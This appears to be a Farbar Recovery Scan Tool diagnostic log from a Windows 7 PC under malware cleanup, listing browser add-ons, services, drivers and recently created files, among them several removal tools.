BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 114.108.193.201 114.108.195.1 192.168.1.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files (x86)\Yahoo!\Shared\npYState.dll No File
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 - C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: DvrClientPlugin - C:\Program Files (x86)\DVRClient Plug-in\npDVRClient.dll ()
FF Plugin HKCU: bluejeans.com/bjninstallplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjninstallplugin_2.6.118.8.dll (Blue Jeans)
FF Plugin HKCU: bluejeans.com/bjnplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjnplugin_2.6.118.8.dll (Blue Jeans)
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\ []
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF [2013-11-25]

Chrome: 
=======
CHR HomePage: hxxp://www.google.com/
CHR StartupUrls: "hxxp://www.google.com/"
CHR DefaultSearchKeyword: ph.yahoo.com
CHR DefaultSearchProvider: Yahoo! Philippines
CHR DefaultSearchURL: http://ph.search.yahoo.com/search?ei={inputEncoding}&fr=crmas&p={searchTerms}
CHR DefaultNewTabURL: 
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll ()
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.450.18) - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java(TM) Platform SE 7 U45) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Live&#153; Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Shockwave for Director) - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll No File
CHR Extension: (Google Docs) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-25]
CHR Extension: (Google Drive) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-25]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-25]
CHR Extension: (YouTube) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-25]
CHR Extension: (Google Search) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-25]
CHR Extension: (Website Logon) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\debkinhcgejcbfgjiaalomcmkedjmiaa [2013-11-25]
CHR Extension: (Yahoo! Toolbar for Chrome) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\eihhgekonheiliaidomffpplfhecmkag [2014-06-03]
CHR Extension: (Skype Click to Call) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-02-21]
CHR Extension: (Norton Identity Safe for Google Chrome) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2013-11-25]
CHR Extension: (Google Wallet) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-25]
CHR Extension: (Gmail) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-25]
CHR HKLM-x32\...\Chrome\Extension: [debkinhcgejcbfgjiaalomcmkedjmiaa] - C:\Program Files (x86)\HP SimplePass 2012\tschrome.crx [2011-08-25]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-04-11]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\Exts\Chrome.crx [2014-05-16]

==================== Services (Whitelisted) =================

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390720 2014-04-11] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1764992 2014-04-11] (Microsoft Corporation)
R2 FPLService; C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe [260424 2011-08-26] (HP)
R2 irstrtsv; C:\Windows\SysWOW64\irstrtsv.exe [184320 2011-07-07] (Intel Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-05] (Symantec Corporation)
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe [276376 2014-05-11] (Symantec Corporation)
R2 UI Assistant Service; C:\Program Files (x86)\SMART BRO\AssistantServices.exe [274760 2012-10-24] ()

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [133672 2011-09-21] (Broadcom Corporation.)
R3 BHDrvx64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys [1530160 2014-05-10] (Symantec Corporation)
R3 BTWDPAN; C:\Windows\System32\DRIVERS\btwdpan.sys [89640 2011-09-21] (Broadcom Corporation.)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-04] (Symantec Corporation)
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1503000.00C\ccSetx64.sys [162392 2013-09-26] (Symantec Corporation)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [484952 2013-11-22] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [137648 2013-11-22] (Symantec Corporation)
R3 FLxHCIh; C:\Windows\System32\DRIVERS\FLxHCIh.sys [77040 2013-06-05] (Fresco Logic)
R3 IDSVia64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IDSvia64.sys [525016 2014-03-26] (Symantec Corporation)
R3 irstrtdv; C:\Windows\System32\DRIVERS\irstrtdv.sys [26504 2011-06-16] (Intel Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\ENG64.SYS [126040 2014-04-20] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\EX64.SYS [2099288 2014-04-20] (Symantec Corporation)
R3 SRTSP; C:\Windows\System32\Drivers\NISx64\1503000.00C\SRTSP64.SYS [875736 2014-02-13] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1503000.00C\SRTSPX64.SYS [36952 2013-09-10] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMDS64.SYS [493656 2013-09-10] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-11-23] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1503000.00C\Ironx64.SYS [264280 2013-09-27] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS [593112 2014-02-18] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-06-04 13:09 - 2014-06-04 13:09 - 00024726 _____ () C:\Users\Hewlett Packard\Desktop\FRST.txt
2014-06-04 13:09 - 2014-06-04 13:09 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\FRST-OlderVersion
2014-06-04 11:59 - 2014-06-04 11:59 - 00086552 _____ () C:\Users\Hewlett Packard\AppData\Local\GDIPFONTCACHEV1.DAT
2014-06-04 11:50 - 2014-06-04 11:51 - 04176736 _____ (Kaspersky Lab ZAO) C:\Users\Hewlett Packard\Desktop\tdsskiller.exe
2014-06-04 11:41 - 2014-06-04 12:02 - 00000112 _____ () C:\Windows\setupact.log
2014-06-04 11:41 - 2014-06-04 11:41 - 00343376 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-06-04 11:41 - 2014-06-04 11:41 - 00000000 _____ () C:\Windows\setuperr.log
2014-06-03 22:27 - 2014-06-03 22:28 - 00001480 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_222723.reg
2014-06-03 16:07 - 2014-06-03 16:09 - 00000507 _____ () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Navigation Canceled.website
2014-06-03 15:54 - 2014-06-03 15:55 - 00001920 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_155455.reg
2014-06-03 12:23 - 2014-06-03 12:23 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (4).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (3).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (2).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (1).exe
2014-06-03 10:07 - 2014-06-03 10:07 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu.exe
2014-06-03 09:01 - 2014-06-03 09:01 - 00002332 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_090128.reg
2014-06-03 09:00 - 2014-06-03 09:00 - 00018346 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_090029.reg
2014-06-03 00:04 - 2014-06-03 01:19 - 00000000 ____D () C:\ProgramData\Yahoo!
2014-06-02 23:57 - 2014-06-02 23:58 - 00691576 _____ (Yahoo! Inc.) C:\Users\Hewlett Packard\Downloads\msgr11us.exe
2014-06-02 23:24 - 2014-06-02 23:25 - 00022858 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_232432.reg
2014-06-02 23:23 - 2014-06-02 23:23 - 00079904 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_232256.reg
2014-06-02 22:13 - 2014-06-02 22:13 - 00000021 _____ () C:\folders.log
2014-06-02 22:13 - 2014-06-02 22:13 - 00000000 ____D () C:\zoek
2014-06-02 22:03 - 2014-06-02 22:14 - 00001521 _____ () C:\zoek-results.log
2014-06-02 22:02 - 2014-06-02 22:14 - 00002957 _____ () C:\runcheck.txt
2014-06-02 21:58 - 2014-06-02 22:14 - 00000000 ____D () C:\zoek_backup
2014-06-02 21:31 - 2014-06-02 21:55 - 01285120 _____ () C:\Users\Hewlett Packard\Desktop\zoek.exe
2014-06-02 21:26 - 2014-06-02 21:27 - 00019570 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_212646.reg
2014-06-02 08:35 - 2014-06-04 09:11 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-06-02 08:35 - 2014-06-02 08:35 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-06-02 08:35 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-06-02 08:35 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-06-02 08:35 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-06-02 08:31 - 2014-06-02 08:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Hewlett Packard\Downloads\mbam-setup-2.0.2.1012.exe
2014-06-02 08:21 - 2014-06-02 08:24 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\AdwCleaner.exe
2014-06-02 08:14 - 2014-06-02 08:14 - 01327971 _____ () C:\Users\Hewlett Packard\Desktop\AdwCleaner.exe
2014-06-01 17:11 - 2014-06-01 17:11 - 00053780 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-05-28 14:10 - 2014-06-04 12:00 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\NCWC
2014-05-27 19:00 - 2014-05-27 19:03 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Google
2014-05-27 18:24 - 2014-05-27 18:24 - 00380416 _____ () C:\Users\Hewlett Packard\Downloads\9kx0sxi1.exe
2014-05-27 18:13 - 2014-05-27 18:13 - 00030075 _____ () C:\Users\Hewlett Packard\Downloads\dds.txt
2014-05-27 18:13 - 2014-05-27 18:13 - 00008131 _____ () C:\Users\Hewlett Packard\Downloads\attach.txt
2014-05-27 18:05 - 2014-05-27 18:05 - 00016141 _____ () C:\Users\Hewlett Packard\Downloads\hijackthis.log
2014-05-27 17:58 - 2014-05-27 17:59 - 00688992 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\dds.scr
2014-05-27 17:56 - 2014-05-27 17:56 - 00388608 _____ (Trend Micro Inc.) C:\Users\Hewlett Packard\Downloads\HijackThis.exe
2014-05-27 17:09 - 2014-05-27 17:09 - 00062571 _____ () C:\Users\Hewlett Packard\Downloads\Shortcut.txt
2014-05-27 17:06 - 2014-06-01 16:50 - 00000000 ____D () C:\Users\Hewlett Packard\Downloads\FRST-OlderVersion
2014-05-27 15:38 - 2014-06-04 12:05 - 00233493 _____ () C:\Windows\WindowsUpdate.log
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Ralph Walker\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Public\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\hedev\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\dub_cm_auto\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default User\AppData\Local\temp
2014-05-27 13:04 - 2014-05-27 13:04 - 00033698 _____ () C:\ComboFix.txt
2014-05-27 12:37 - 2011-06-26 14:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-05-27 12:37 - 2010-11-08 01:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-05-27 12:37 - 2009-04-20 12:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00098816 _____ () C:\Windows\sed.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00080412 _____ () C:\Windows\grep.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00068096 _____ () C:\Windows\zip.exe
2014-05-27 12:35 - 2014-05-27 13:05 - 00000000 ____D () C:\Qoobox
2014-05-27 12:35 - 2014-05-27 12:59 - 00000000 ____D () C:\Windows\erdnt
2014-05-27 12:28 - 2014-05-27 12:28 - 05200919 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\username123.exe
2014-05-27 12:22 - 2014-05-27 12:22 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\adwcleaner_3.211.exe
2014-05-27 09:49 - 2014-05-27 09:49 - 00007606 _____ () C:\Users\Hewlett Packard\AppData\Local\Resmon.ResmonCfg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233429.reg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233404.reg
2014-05-26 23:33 - 2014-05-26 23:33 - 00012436 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233313.reg
2014-05-26 23:31 - 2014-05-26 23:32 - 00046014 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233124.reg
2014-05-25 20:12 - 2014-05-25 20:13 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\SkyCable
2014-05-25 18:58 - 2014-06-02 23:40 - 00001969 _____ () C:\Users\Public\Desktop\Samsung Kies 3.lnk
2014-05-25 18:58 - 2014-05-25 18:58 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\SelfMV
2014-05-25 18:58 - 2014-04-02 11:18 - 00144664 _____ (MAPILab Ltd. & Add-in Express Ltd.) C:\Windows\SysWOW64\secman.dll
2014-05-25 18:46 - 2014-04-11 16:39 - 00206080 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudmdm.sys
2014-05-25 18:46 - 2014-04-11 16:39 - 00110336 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudbus.sys
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Downloads\Rkill.txt
2014-05-25 07:01 - 2014-05-27 17:09 - 00031358 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-25 06:57 - 2014-06-04 09:02 - 00000000 ____D () C:\AdwCleaner
2014-05-25 06:57 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-05-25 06:56 - 2014-06-04 13:09 - 00000000 ____D () C:\FRST
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:48 - 2014-06-04 13:09 - 02068992 _____ (Farbar) C:\Users\Hewlett Packard\Desktop\FRST64.exe
2014-05-25 05:46 - 2014-05-27 09:29 - 00000000 ____D () C:\NPE
2014-05-25 05:44 - 2014-05-27 09:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 04:13 - 2014-05-26 10:07 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-23 18:58 - 2014-05-23 19:22 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 18:57 - 2014-05-23 19:09 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-17 03:14 - 2014-05-06 12:40 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-17 03:14 - 2014-05-06 12:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:25 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-17 03:14 - 2014-05-06 11:07 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:00 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-17 03:14 - 2014-05-06 10:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-15 15:04 - 2014-05-09 14:14 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-15 15:04 - 2014-05-09 14:11 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-15 15:04 - 2014-04-12 10:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-05-15 15:04 - 2014-04-12 10:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-05-15 15:04 - 2014-04-12 10:19 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-05-15 15:04 - 2014-04-12 10:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:12 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:10 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-05-15 15:04 - 2014-03-25 10:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-05-15 15:04 - 2014-03-25 10:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-05-15 15:04 - 2014-03-04 17:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
